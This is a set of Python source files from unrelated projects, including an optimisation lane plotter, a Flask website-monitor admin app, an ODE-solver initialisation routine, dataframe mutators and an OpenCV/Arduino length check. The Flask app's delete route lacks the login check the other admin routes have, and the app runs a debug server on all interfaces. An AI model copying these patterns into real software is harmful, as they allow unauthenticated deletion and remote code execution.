-> None\n \"\"\"Make sure this `Recorder` is attached to a `Driver` and obtain the maximum number of iterations.\n\n Parameters\n ----------\n object_requesting_recording : :obj:`Driver`\n Instance of `Driver` to which this `Recorder` is attached.\n \"\"\"\n if not isinstance(object_requesting_recording, Driver):\n raise ValueError('This Recorder 
should be attached to a Driver.')\n\n if 'maxiter' in object_requesting_recording.options:\n self.max_iter = object_requesting_recording.options['maxiter']\n\n super(BaseLanePlotter, self).startup(object_requesting_recording)\n\n @abstractmethod\n def init_vars(self):\n # type: () -> None\n \"\"\"Initialize the variables of the plot.\n\n This method should be implemented by subclasses such that they can control how variables are initialized.\n \"\"\"\n raise NotImplementedError\n\n def init_fig(self, fig):\n # type: (Figure) -> None\n \"\"\"Initialize the figure, setting up axes, labels, the colorbar, etc.\n\n Parameters\n ----------\n fig : :obj:`Figure`\n Instance of the `Figure` which should be populated.\n \"\"\"\n self.init_vars()\n\n self.xs, self.ys = np.meshgrid(np.arange(0., self.max_iter+.5)-.5, np.arange(0., self.n_vars+.5)-.5)\n self.cs = np.zeros((self.n_vars, self.max_iter))\n\n self.ax = fig.add_subplot(111)\n self.ax.xaxis.set_major_locator(ticker.MaxNLocator(integer=True))\n self.ax.yaxis.set_ticks(np.arange(0, self.n_vars))\n self.ax.yaxis.set_ticklabels(self.var_names)\n\n self.ax.set_xlim([-.5, .5])\n self.ax.set_ylim([-.5, self.n_vars-.5])\n self.quad = self.ax.pcolormesh(self.xs, self.ys, self.cs,\n vmin=self.vmin, vmax=self.vmax, cmap=self.cmap, norm=self.norm)\n\n fig.colorbar(self.quad)\n\n self.ax.set_xlabel('Evaluation #')\n\n @abstractmethod\n def _compute_new_data(self, desvars, responses, objectives, constraints, metadata):\n # type: (dict, dict, dict, dict, dict) -> np.ndarray\n \"\"\"Return a 1D numpy.ndarray containing the new data points.\n\n Parameters\n ----------\n desvars, responses, objectives, constraints, metadata : dict\n Dictionaries of the new design, response, objective, and constraint variables, as well as metadata.\n\n Returns\n -------\n np.ndarray\n A 1D numpy array containing the new data.\n \"\"\"\n raise NotImplementedError\n\n def _update_plot(self, *args):\n # type: (dict, dict, dict, dict, dict) -> None\n \"\"\"Insert the new data into the plot and refresh it.\n\n Parameters\n ----------\n desvars, responses, objectives, constraints, metadata : dict\n Dictionaries of the new design, response, objective, and constraint variables, as well as metadata.\n \"\"\"\n if len(args) != 5 and not any([isinstance(arg, dict) for arg in args]):\n raise ValueError('Illegal arguments for _update_plot of %s' % self.__name__)\n desvars, responses, objectives, constraints, metadata = args\n\n data = self._compute_new_data(desvars, responses, objectives, constraints, metadata)\n self.cs[:, self.iter] = data[:]\n self.quad.set_array(self.cs.ravel())\n self.ax.set_xlim([-.5, self.iter+.5])\n self.iter += 1\n","sub_path":"openlego/recorders/base_lane_plotter.py","file_name":"base_lane_plotter.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
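Since `BaseLanePlotter` is abstract, a subclass only has to fill in `init_vars` (one lane per variable) and `_compute_new_data` (one colour value per lane per evaluation). A minimal sketch, assuming two scalar design variables; the class name, variable names and desvars keys below are hypothetical, not part of openlego:

import numpy as np

class TwoVarLanePlotter(BaseLanePlotter):
    def init_vars(self):
        # hypothetical design variables, one horizontal lane each
        self.var_names = ['x0', 'x1']
        self.n_vars = len(self.var_names)

    def _compute_new_data(self, desvars, responses, objectives, constraints, metadata):
        # colour of each lane for the current evaluation
        return np.array([desvars['x0'], desvars['x1']])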
+{"seq_id":"365485417","text":"#!/usr/bin/python3.5\n# coding: utf-8\n\n\"\"\"\n\n Author : github/TonyChg\n Purpose :\n Usage :\n Example :\n\n\"\"\"\n\nimport urllib\nimport requests\nimport mysql.connector\nimport threading\nfrom database import Database\n\nfrom passlib.hash import argon2\nfrom flask import Flask, render_template, g, redirect, \\\n url_for, request, abort, session\n\nfrom status import Status\nfrom datetime import datetime\n\ntry:\n app = Flask(__name__)\n app.config.from_object('config')\n database = Database(\n app.config['DATABASE_HOST'],\n app.config['DATABASE_USER'],\n app.config['DATABASE_PASSWORD'],\n app.config['DATABASE_NAME']\n )\nexcept Exception as e:\n print(e)\n print(\"Fail to start. exiting\")\n exit(1)\n\ndef validate_url(url):\n try:\n result = urllib.parse.urlparse(url)\n if result.scheme != 'http' and result.scheme != 'https':\n raise ValueError\n return True\n except:\n return False\n\ndef request_to_dict(keys):\n entity = []\n for key in keys:\n entity.append((key, request.form.get(key)))\n return dict(entity)\n\ndef human_timestamp(timestamp):\n time = datetime.strptime(str(timestamp), \"%Y-%m-%d %H:%M:%S\")\n delta = datetime.now() - time\n formattime = \"\"\n\n if hasattr(delta, 'hours'):\n formattime += \"{} h\".format(delta.hours)\n if hasattr(delta, 'minutes'):\n formattime += \"{} m\".format(delta.minutes)\n if hasattr(delta, 'seconds'):\n formattime += \"{} s\".format(delta.seconds)\n print(formattime)\n return formattime\n\ndef authenticate_user():\n try:\n user = request_to_dict(['email', 'password'])\n\n if not user['email'] or not user['password']:\n raise Exception('Invalid form.')\n find_user = database.find_user_by_email(user['email'])\n\n if not find_user or not argon2.verify(user['password'], find_user[1]):\n raise Exception('Invalid crendentials')\n else:\n print(\"Authenticated user: {}\".format(find_user[0]))\n session['logged_user'] = find_user[0]\n return redirect(url_for('admin'))\n except Exception as e:\n return render_template('login.html', message=e)\n\n@app.route('/admin/delete/website/', methods=[\"GET\"])\ndef delete_website(website_id):\n try:\n find_website = database.fetch_one_website(website_id)\n if not find_website[0]:\n raise Exception('Invalid website id.')\n database.delete_website(find_website[0])\n return redirect(url_for('admin'))\n except Exception as e:\n abort(404)\n\n@app.route('/admin/create/website', methods=['GET', 'POST'])\ndef create_website():\n if not session.get('logged_user'):\n return redirect(url_for('connection'))\n if request.method == 'GET':\n return render_template('create_website.html')\n try:\n website = request_to_dict(['url', 'title'])\n if not website['url']:\n raise Exception('Invalid form.')\n if not validate_url(website['url']):\n raise Exception('Invalid url.')\n database.create_website(website)\n return redirect(url_for('admin'))\n except Exception as e:\n return render_template('create_website.html', message=e.args[0])\n\n@app.route('/admin/websites//delete/status')\ndef delete_status(website_id):\n if not session.get('logged_user'):\n return redirect(url_for('connection'))\n try:\n database.delete_status(website_id)\n return redirect(url_for('show_status', website_id=website_id))\n except Exception as e:\n abort(404)\n\n@app.route('/admin/websites/')\ndef show_status(website_id):\n if not session.get('logged_user'):\n return redirect(url_for('connection'))\n try:\n website = database.fetch_one_website(website_id)\n status = database.fetch_status_by_website(website_id)\n return 
render_template('show_status.html', website=website, status=status)\n except Exception as e:\n abort(404)\n\n@app.route('/disconnect')\ndef disconnect():\n if session['logged_user']:\n session.clear()\n return redirect(url_for('index'))\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/admin')\ndef admin():\n try:\n user = session['logged_user']\n websites = database.fetch_all_websites()\n return render_template('admin.html', websites=websites)\n except Exception as e:\n return redirect(url_for('connection'))\n\n@app.route('/login', methods=['GET', 'POST'])\ndef connection():\n if request.method == 'GET':\n return render_template('login.html')\n else:\n return authenticate_user()\n\nif __name__ == '__main__':\n status = Status(name=\"Status Watchers\")\n status.start()\n app.run(threaded=True, debug=True, use_reloader=False, host='0.0.0.0')\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
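The `<int:website_id>` converters restored in the routes above (the angle-bracket segments appear to have been stripped as HTML remnants, since each view function already takes a `website_id` argument) are standard Flask routing syntax: the segment is captured from the URL, cast to int, and passed as the view's keyword argument. A quick check, runnable in the same module as `app`:

# '/admin/websites/3' dispatches to show_status(website_id=3), and the reverse holds:
with app.test_request_context():
    assert url_for('show_status', website_id=3) == '/admin/websites/3'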
+{"seq_id":"471452875","text":"from rest_framework import serializers\nfrom .models import BasicProduct, SoldBasicProduct\nfrom ..customAuth.serializers import SafeUserDataSerializer\n\n\nclass BasicProductSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = BasicProduct\n fields = ('id', 'title', 'slug', 'active', 'price')\n\n extra_kwargs = {\n 'id': {'read_only': True},\n 'slug': {'read_only': True},\n }\n\n\nclass SoldBasicProductSerializer(serializers.ModelSerializer):\n url = serializers.HyperlinkedIdentityField(\n lookup_field='id',\n view_name=\"basic-product:sold-basic-product-detail\",\n read_only=True\n )\n\n basic_product = serializers.HyperlinkedRelatedField(\n read_only=True,\n lookup_field='slug',\n view_name='basic-product:basic-product-detail'\n )\n\n sold_to = serializers.SerializerMethodField()\n\n class Meta:\n model = SoldBasicProduct\n fields = [\n 'id', 'url', 'basic_product', 'price', 'sold_to',\n ]\n\n def get_sold_to(self, obj):\n return SafeUserDataSerializer(obj.sold_to).data\n","sub_path":"code/sNeeds/apps/basicProducts/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"584092120","text":"# -*- coding: utf-8 -*-\n\"\"\"\n.. module:: size_of_data_set_incremental_experiment\n :platform: Unix, Windows\n :synopsis: This module contains an abstract class used to conduct \n the first sub experiment of the preliminary experiment \n of the thesis. The experiment consists mainly of trying \n to find the optimal number of bug reports that should \n be used to train a classifier. In the context of the \n first sub experiment, all the folds, except the oldest \n one, are used to evaluate the performance of the \n classifier (cf. Master's Thesis). \n\n.. moduleauthor:: Daniel Artchounin \n\n\n\"\"\"\n\nimport numpy as np\nimport abc\nimport os\nimport inspect\n\ncurrent_dir = os.path.dirname(os.path.abspath( \\\ninspect.getfile(inspect.currentframe())))\nos.sys.path.insert(0, current_dir)\nfrom sub_exp_of_preliminary_exp_launcher \\\nimport SubExpOfPreliminaryExpLauncher\n \nclass SubExp1OfPreliminaryExpLauncher(SubExpOfPreliminaryExpLauncher):\n \n @abc.abstractmethod\n def __init__(self, data_set_file, developers_dict_file, \\\n developers_list_file):\n super().__init__(data_set_file, developers_dict_file, \\\n developers_list_file)\n self._type = \"incremental\"\n \n def _yield_indices_for_learning_curve(self, K=33):\n super()._yield_indices_for_learning_curve(K)\n number_of_instances = self._X.shape[0]\n indices = super()._custom_linspace(0, number_of_instances, K+1)\n for i in range(len(indices)-2, 0, -1):\n for j in range(i):\n yield np.asarray(range(indices[j], indices[i])), \\\n np.asarray(range(indices[i], indices[i+1]))\n \n def _generate_list_indices_for_learning_curve(self, K=33):\n super()._generate_list_indices_for_learning_curve(K)\n number_of_instances = self._X.shape[0]\n indices = super()._custom_linspace(0, number_of_instances, K+1)\n train_indices = []\n test_indices = []\n for i in range(len(indices)-2, 0, -1):\n for j in range(i):\n train_indices.append(list(range(indices[j], indices[i])))\n test_indices.append(list(range(indices[i], indices[i+1])))\n return train_indices, test_indices \n \n def plot_or_save_learning_curve(self, K=33, save_file=True):\n super().plot_or_save_learning_curve(K, save_file)","sub_path":"src/preliminary_experiment/sub_exp_1_of_preliminary_exp_launcher.py","file_name":"sub_exp_1_of_preliminary_exp_launcher.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"257849216","text":"\"\"\"Runge-Kutta initialisation.\"\"\"\n\n\nfrom typing import Optional\n\nimport numpy as np\nimport scipy.integrate as sci\n\nfrom probnum import filtsmooth, problems, randprocs, randvars\nfrom probnum.diffeq.odefilter.initialization_routines import _initialization_routine\nfrom probnum.typing import FloatArgType\n\n\nclass RungeKuttaInitialization(_initialization_routine.InitializationRoutine):\n r\"\"\"Initialize a probabilistic ODE solver by fitting the prior process to a few steps of an approximate ODE solution computed with Scipy's Runge-Kutta methods.\n\n Parameters\n ----------\n dt\n Maximum step-size to use for computing the approximate ODE solution. The smaller, the more accurate, but also, the smaller, the less stable.\n The best value here depends on the ODE problem, and probably the chosen method. Optional. Default is ``1e-2``.\n method\n Which solver to use. This is communicated as a string that is compatible with ``scipy.integrate.solve_ivp(..., method=method)``.\n Optional. Default is `DOP853`.\n\n Examples\n --------\n\n >>> import numpy as np\n >>> from probnum.randvars import Normal\n >>> from probnum.problems.zoo.diffeq import vanderpol\n >>> from probnum.randprocs.markov.integrator import IntegratedWienerProcess\n\n Compute the initial values of the van-der-Pol problem as follows.\n First, we set up the ODE problem and the prior process.\n\n >>> ivp = vanderpol()\n >>> print(ivp.y0)\n [2. 0.]\n >>> prior_process = IntegratedWienerProcess(initarg=ivp.t0, num_derivatives=3, wiener_process_dimension=2)\n\n Next, we call the initialization routine.\n\n >>> rk_init = RungeKuttaInitialization()\n >>> improved_initrv = rk_init(ivp=ivp, prior_process=prior_process)\n >>> print(prior_process.transition.proj2coord(0) @ improved_initrv.mean)\n [2. 0.]\n >>> print(np.round(improved_initrv.mean, 1))\n [ 2. 0. -2. 58.2 0. -2. 60. -1745.7]\n >>> print(np.round(np.log10(improved_initrv.std), 1))\n [-13.8 -11.3 -9. -1.5 -13.8 -11.3 -9. -1.5]\n \"\"\"\n\n def __init__(\n self, dt: Optional[FloatArgType] = 1e-2, method: Optional[str] = \"DOP853\"\n ):\n self.dt = dt\n self.method = method\n super().__init__(is_exact=False, requires_jax=False)\n\n def __call__(\n self,\n ivp: problems.InitialValueProblem,\n prior_process: randprocs.markov.MarkovProcess,\n ) -> randvars.RandomVariable:\n \"\"\"Compute the initial distribution.\n\n For Runge-Kutta initialization, it goes as follows:\n\n 1. The ODE integration problem is set up on the interval ``[t0, t0 + (2*order+1)*h0]``\n and solved with a call to ``scipy.integrate.solve_ivp``. The solver is uses adaptive steps with ``atol=rtol=1e-12``,\n but is forced to pass through the\n events ``(t0, t0+h0, t0 + 2*h0, ..., t0 + (2*order+1)*h0)``.\n The result is a vector of time points and states, with at least ``(2*order+1)``.\n Potentially, the adaptive steps selected many more steps, but because of the events, fewer steps cannot have happened.\n\n 2. A prescribed prior is fitted to the first ``(2*order+1)`` (t, y) pairs of the solution. ``order`` is the order of the prior.\n\n 3. The value of the resulting posterior at time ``t=t0`` is an estimate of the state and all its derivatives.\n The resulting marginal standard deviations estimate the error. This random variable is returned.\n\n Parameters\n ----------\n ivp\n Initial value problem.\n prior_process\n Prior Gauss-Markov process.\n\n Returns\n -------\n Normal\n Estimated (improved) initial random variable. 
Compatible with the specified prior.\n \"\"\"\n f, y0, t0, df = ivp.f, ivp.y0, ivp.t0, ivp.df\n y0 = np.asarray(y0)\n ode_dim = y0.shape[0] if y0.ndim > 0 else 1\n order = prior_process.transition.num_derivatives\n\n # order + 1 would suffice in theory, 2*order + 1 is for good measure\n # (the \"+1\" is a safety factor for order=1)\n num_steps = 2 * order + 1\n t_eval = np.arange(t0, t0 + (num_steps + 1) * self.dt, self.dt)\n sol = sci.solve_ivp(\n f,\n (t0, t0 + (num_steps + 1) * self.dt),\n y0=y0,\n atol=1e-12,\n rtol=1e-12,\n t_eval=t_eval,\n method=self.method,\n )\n\n # Measurement model for SciPy observations\n proj_to_y = prior_process.transition.proj2coord(coord=0)\n zeros_shift = np.zeros(ode_dim)\n zeros_cov = np.zeros((ode_dim, ode_dim))\n measmod_scipy = randprocs.markov.discrete.LTIGaussian(\n proj_to_y,\n zeros_shift,\n zeros_cov,\n proc_noise_cov_cholesky=zeros_cov,\n forward_implementation=\"sqrt\",\n backward_implementation=\"sqrt\",\n )\n\n # Measurement model for initial condition observations\n proj_to_dy = prior_process.transition.proj2coord(coord=1)\n if df is not None and order > 1:\n proj_to_ddy = prior_process.transition.proj2coord(coord=2)\n projmat_initial_conditions = np.vstack((proj_to_y, proj_to_dy, proj_to_ddy))\n initial_data = np.hstack((y0, f(t0, y0), df(t0, y0) @ f(t0, y0)))\n else:\n projmat_initial_conditions = np.vstack((proj_to_y, proj_to_dy))\n initial_data = np.hstack((y0, f(t0, y0)))\n zeros_shift = np.zeros(len(projmat_initial_conditions))\n zeros_cov = np.zeros(\n (len(projmat_initial_conditions), len(projmat_initial_conditions))\n )\n measmod_initcond = randprocs.markov.discrete.LTIGaussian(\n projmat_initial_conditions,\n zeros_shift,\n zeros_cov,\n proc_noise_cov_cholesky=zeros_cov,\n forward_implementation=\"sqrt\",\n backward_implementation=\"sqrt\",\n )\n\n # Create regression problem and measurement model list\n ts = sol.t[:num_steps]\n ys = list(sol.y[:, :num_steps].T)\n ys[0] = initial_data\n measmod_list = [measmod_initcond] + [measmod_scipy] * (len(ts) - 1)\n regression_problem = problems.TimeSeriesRegressionProblem(\n observations=ys, locations=ts, measurement_models=measmod_list\n )\n\n # Infer the solution\n kalman = filtsmooth.gaussian.Kalman(prior_process)\n out, _ = kalman.filtsmooth(regression_problem)\n estimated_initrv = out.states[0]\n return estimated_initrv\n","sub_path":"src/probnum/diffeq/odefilter/initialization_routines/_runge_kutta.py","file_name":"_runge_kutta.py","file_ext":"py","file_size_in_byte":6561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"606611295","text":"import collections\n\nimport numpy as np\nimport pandas as pd\n\nfrom typing import List, Callable, Union, Sequence\n\nMutator = Callable[[pd.DataFrame], pd.DataFrame]\n\n\ndef mutate_baselines(baseline_datas: List[pd.DataFrame],\n baselines_mutators: List[Mutator],\n inplace_mutations: Union[bool, Sequence[bool]] = True) -> List[pd.DataFrame]:\n \"\"\"\n Mutates the inputted baselines using the mutators.\n A mutation can be either inplace or create a new mutated version of each baselines in addition to the original\n This is done using the sequence inplace_mutations - for each mutator if the boolean in the same position within\n the sequence is True the mutation will be inplace, and if False the mutation will create a copy.\n If inplace_mutations is a single boolean, it will be treated as if all mutators have that value\n\n :param baseline_datas: the baselines to mutate\n :param baselines_mutators: the mutators to use - each will be used an all baselines\n :param inplace_mutations: marks which mutators will be inplace and which will create copies\n :return: a list of all mutated baselines (can contain both inplace and new mutations)\n \"\"\"\n if isinstance(inplace_mutations, collections.Sequence):\n assert len(inplace_mutations) == len(baselines_mutators), \"inplace specifications must match number of mutators\"\n else:\n inplace_mutations: List[bool] = [inplace_mutations] * len(baselines_mutators)\n\n mutated_baselines = [baseline_data.copy() for baseline_data in baseline_datas]\n\n for mutator, is_inplace_mutation in zip(baselines_mutators, inplace_mutations):\n if is_inplace_mutation:\n mutated_baselines = [mutator(baseline_data) for baseline_data in mutated_baselines]\n else:\n mutated_baselines += [mutator(baseline_data) for baseline_data in mutated_baselines]\n\n return mutated_baselines\n\n\ndef mult_baseline_sizes_mutation(mult: int, baseline_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n multiplies the total amount of bytes and packets by a constant integer\n :param mult: the multitude by which the sizes will be multiplied\n :param baseline_data: the baseline to be mutated\n :return: a copy of the data with the sizes multiplied by the constant\n \"\"\"\n mutated_baseline = baseline_data.copy()\n mutated_baseline[['total_bytes', 'num_packets']] *= mult\n return mutated_baseline\n\n\ndef sizes_mult_mutator(mult: int) -> Mutator:\n \"\"\"\n creates a mutation method of `mult_baseline_sizes_mutation` with the inputted value\n :param mult: the constant the `mult_baseline_sizes_mutation` will use\n :return: the mutation method\n \"\"\"\n return lambda baseline_data: mult_baseline_sizes_mutation(mult, baseline_data)\n\n\ndef shuffle_protocols_mutation(baseline_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n shuffle the indices of a baseline randomly\n :param baseline_data: the baseline to mutate\n :return: a copy of the baseline with the indices (protocols) shuffled\n \"\"\"\n shuffled_indices: list = baseline_data.index.to_numpy().tolist()\n np.random.shuffle(shuffled_indices)\n\n return pd.DataFrame(baseline_data.to_numpy(), columns=baseline_data.columns, index=shuffled_indices)\n\n\ndef switch_2_protocols_mutation(baseline_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n switches the indices of 2 randomly chosen rows in the baseline\n :param baseline_data: the baseline to mutate\n :return: a copy of the baseline with 2 rows' indices being switched\n \"\"\"\n indices: list = baseline_data.index.to_numpy().tolist()\n\n idx_to_switch = 
np.random.choice(np.arange(len(indices)), size=2, replace=False)\n indices[idx_to_switch[0]], indices[idx_to_switch[1]] = indices[idx_to_switch[1]], indices[idx_to_switch[0]]\n\n return pd.DataFrame(baseline_data.to_numpy(), columns=baseline_data.columns, index=indices)\n\n\ndef change_values_by_x_percent_mutation(baseline_data: pd.DataFrame, mutation_percentage: float,\n features_to_change: List[str] = None,\n protocols_to_change: List[str] = None) -> pd.DataFrame:\n \"\"\"\n randomly changes the features of a baseline randomly by at most mutation_percentage,\n only in the protocols and features specified.\n Each value will that will be changed will be multiplied by a random number in the range (1-X, 1+X),\n When X is the mutation percentage\n :param baseline_data: the baseline to mutate\n :param mutation_percentage: the max percentage by which the mutated values can change from the original\n :param features_to_change: the features to be changed randomly. by default all features are changed\n :param protocols_to_change: the protocols to be changed randomly. by default all protocols are changed\n :return: the baseline randomly changed\n \"\"\"\n if features_to_change is None:\n features_to_change = baseline_data.columns.to_numpy().tolist()\n\n if protocols_to_change is None:\n protocols_to_change = baseline_data.index.to_numpy().tolist()\n\n rand_vals = pd.DataFrame(\n np.random.uniform(1 - mutation_percentage, 1 + mutation_percentage, size=baseline_data.to_numpy().shape),\n columns=baseline_data.columns, index=baseline_data.index)\n\n # set features and protocols that should not be changed to be multiplied by 1\n rand_vals[list(set(rand_vals.columns).difference(features_to_change))] = 1.0\n rand_vals.loc[list(set(rand_vals.index).difference(protocols_to_change))] = 1.0\n\n mutated_data = baseline_data * rand_vals\n for col in mutated_data.columns:\n mutated_data[col] = mutated_data[col].astype(baseline_data[col].dtype)\n\n return mutated_data\n\n\ndef rand_by_x_percent_mutator(mutation_percentage: float, features_to_change: List[str] = None,\n protocols_to_change: List[str] = None) -> Mutator:\n \"\"\"\n Returns a `change_values_by_x_percent_mutation` with the inputted percentage, features and protocols\n :param mutation_percentage: the max percentage by which the mutated values can change from the original\n :param features_to_change: the features to be changed randomly. by default all features are changed\n :param protocols_to_change: the protocols to be changed randomly. by default all protocols are changed\n :return: the mutation method\n \"\"\"\n return lambda baseline_data: change_values_by_x_percent_mutation(baseline_data, mutation_percentage,\n features_to_change, protocols_to_change)\n\n\n__all__ = [\n 'Mutator',\n 'mutate_baselines',\n 'mult_baseline_sizes_mutation',\n 'sizes_mult_mutator',\n 'shuffle_protocols_mutation',\n 'switch_2_protocols_mutation',\n 'change_values_by_x_percent_mutation',\n 'rand_by_x_percent_mutator',\n]\n","sub_path":"ReinforcementLearning/mutators.py","file_name":"mutators.py","file_ext":"py","file_size_in_byte":6861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
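A small usage sketch of the mutators module above; the baseline frame and its values are made up, but the column names match the ones `mult_baseline_sizes_mutation` expects:

import pandas as pd

baseline = pd.DataFrame(
    {'total_bytes': [1000, 2000], 'num_packets': [10, 20]},
    index=['tcp', 'udp'])

mutated = mutate_baselines(
    [baseline],
    [sizes_mult_mutator(2), shuffle_protocols_mutation],
    inplace_mutations=[True, False])

# the first mutator doubled the sizes in place (list still holds 1 frame);
# the second kept the originals and appended shuffled copies (2 frames total)
print(len(mutated))  # 2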
+{"seq_id":"257053137","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ninput = open(\"throughput_ins.csv\", 'r', encoding='utf-8')\n\nkey = []\nva = []\nfb_va_ss = []\nfb_std_ss = []\nfb_va = []\nfb_std = []\nbloom = []\n\nfor line in input.readlines():\n if line.find('occ') != -1: continue\n cur_line = line.strip()\n row = [0, 0, 0, 0, 0, 0, 0]\n row[0], row[1], row[2], row[3], row[4], row[5], row[6] = map(float, cur_line.split(',')[0:-1])\n key.append(row[0])\n va.append(row[1])\n bloom.append(row[2])\n fb_va_ss.append(row[3])\n fb_std_ss.append(row[4])\n fb_va.append(row[5])\n fb_std.append(row[6])\n\nkey = np.array(key)\nva = np.array(va)\nfb_va_ss = np.array(fb_va_ss)\nfb_std_ss = np.array(fb_std_ss)\nfb_va = np.array(fb_va)\nfb_std = np.array(fb_std)\nbloom = np.array(bloom)\n\nprint(fb_std_ss)\n\nplt.figure(figsize = (12, 9))\nplt.plot(key, fb_std, marker = \"+\", label = \"CF\", markersize = 12)\nplt.plot(key, fb_va, marker = \"*\", label = \"VF\", markersize = 12)\nplt.plot(key, bloom, marker = \"s\", label = \"BF\", markersize = 12)\nplt.plot(key, fb_std_ss, marker = \"v\", label = \"CF-ss (Padding)\", markersize = 12)\nplt.plot(key, fb_va_ss, marker = \"^\", label = \"VF-ss (Padding)\", markersize = 12)\nplt.plot(key, va, marker = \"o\", label = \"VF-ss (No Padding)\", markersize = 12)\n\nplt.legend(loc = \"best\", fontsize = 28, ncol = 2)\nplt.xlabel(\"Occupancy\", fontsize = 28)\n#plt.ylabel(\"Bits per Item\")\nplt.ylabel(\"Insert Throughput (MOPS)\", fontsize = 28)\n\n#t = key[-1]\n#xtick = np.linspace(float(key[0]), float(t), 8)\n#print(xtick)\nplt.xlim((-0.03, 1))\nplt.xticks(np.linspace(0, 1, 5), fontsize = 28)\nplt.yticks(np.linspace(0, 25, 6), fontsize = 28)\n\n#ytick = np.linspace(float(sscf12[0]), float(sscf12[-1]), 10)\n#print(ytick)\n#plt.ylim((sscf12[0], sscf12[-1]))\n#plt.yticks(ytick)\n\nplt.savefig(\"ins-throughput.png\")\n#plt.show()\n\nexit()\n\nplt.semilogx(w, bf, lw = 1.5, linestyle = \"--\", label = \"Bloom Filter\")\n#plt.semilogx(w, vf, lw = 1.5, label = \"Vacuum Filter\")\n#plt.semilogx(w, cf_best, lw = 1.5, linestyle = \"-.\", label = \"Cuckoo Filter Best Case\")\nplt.semilogx(w, vf, lw = 1.5, color = \"black\", label = \"Vacuum Filter / CF Best Case\")\nplt.semilogx(w, cf_avg, lw = 1.5, linestyle = \"-\", label = \"Cuckoo Filter Average Case\")\nplt.semilogx(w, cf_worst, lw = 1.5, label = \"Cuckoo Filter Worst Case\")\nplt.semilogx(w, low_bound, lw = 1, linestyle = \":\", color = \"black\", label = \"Lower Bound\")\nplt.xlabel(\"False Postive Rate\")\nplt.ylabel(\"Bits per Item\")\nplt.legend(loc = \"upper right\")\nplt.show()\n\nexit()\n\n#print(abs_time)\nprint(velocity)\n#print(height)\nplt.subplot(4, 1, 1)\nplt.plot(abs_time, a_z)\nplt.ylabel('Acceleration : m/s^2')\n\nplt.subplot(4, 1, 2)\nplt.plot(abs_time, velocity)\nplt.ylabel('Velocity : m/s')\n\nplt.subplot(4, 1, 3)\nplt.plot(abs_time, height)\nplt.ylabel('Height : m')\n\nplt.subplot(4, 1, 4)\nplt.plot(abs_time, h)\nplt.ylabel('Height_M : m')\n\nplt.xlabel('time : s')\nplt.show()\n\n","sub_path":"Figures/gen-ins.py","file_name":"gen-ins.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"2735808","text":"import numpy as np\nimport cv2\nimport math\nimport serial\narduino = serial.Serial('COM6', 9600)\n# arduino = serial.Serial('COM5', 9600)\nchup =0;\ncap = cv2.VideoCapture(0)\ncap.set(3,640)\ncap.set(4,480)\ntong=0\ndata=0\ndef pythonreply(para):\n msg = str(para)\n arduino.write(bytes(msg))\n print(msg)\nwhile True:\n length=0\n ret, img = cap.read()\n data = arduino.read()\n data = str(data)\n key = cv2.waitKey(10) \n ret, img = cap.read()\n if img is None:\n break\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n edges = cv2.Canny(gray, 200, 220)\n lines = cv2.HoughLinesP(edges, 1, math.pi/1, 10, 10, 2, 350);\n\n dot1 = (lines[0][0][0],lines[0][0][1])\n dot2 = (lines[0][0][2],lines[0][0][3])\n cv2.line(img, dot1, dot2, (0,0,255), 3)\n cv2.imshow(\"output\", img)\n # print (length)\n key = cv2.waitKey(10)\n \n if key == 27:\n break\n if data==\"c\":\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n edges = cv2.Canny(gray, 100, 120)\n lines = cv2.HoughLinesP(edges, 1, math.pi/1, 20, None, 2, 480);\n\n dot1 = (lines[0][0][0],lines[0][0][1])\n dot2 = (lines[0][0][2],lines[0][0][3])\n cv2.line(img, dot1, dot2, (0,0,255), 3)\n cv2.imshow(\"output\", img)\n length = lines[0][0][1] - lines[0][0][3] \n print(length)\n if(length<180 or length>220):\n print(\"khong dat\")\n pythonreply(0)\n data=\"kc\"\n elif(length>=180 and length<=220):\n print(\"dat\")\n pythonreply(1)\n data=\"kc\" \n length=0 \ncv2.destroyAllWindows() \ncv2.VideoCapture(0).release()","sub_path":"ImageProcessing.py","file_name":"ImageProcessing.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"324819168","text":"from tkinter import *\n\nclass Window(Frame):\n def __init__(self, master = None):\n Frame.__init__(self, master = None)\n self.master = master\n self.init_window()\n\n def init_window(self):\n self.master.title(\"Main Menu\")\n self.pack(fill=BOTH, expand = 1)\n\n logoutButton = Button(self, text = \"Log Out\")\n logoutButton.place(x = 740, y = 10)\n\n \n\n\nroot = Tk()\nroot.geometry(\"800x450\")\napp = Window(root)\nroot.mainloop()","sub_path":"UI/studentMenu.py","file_name":"studentMenu.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
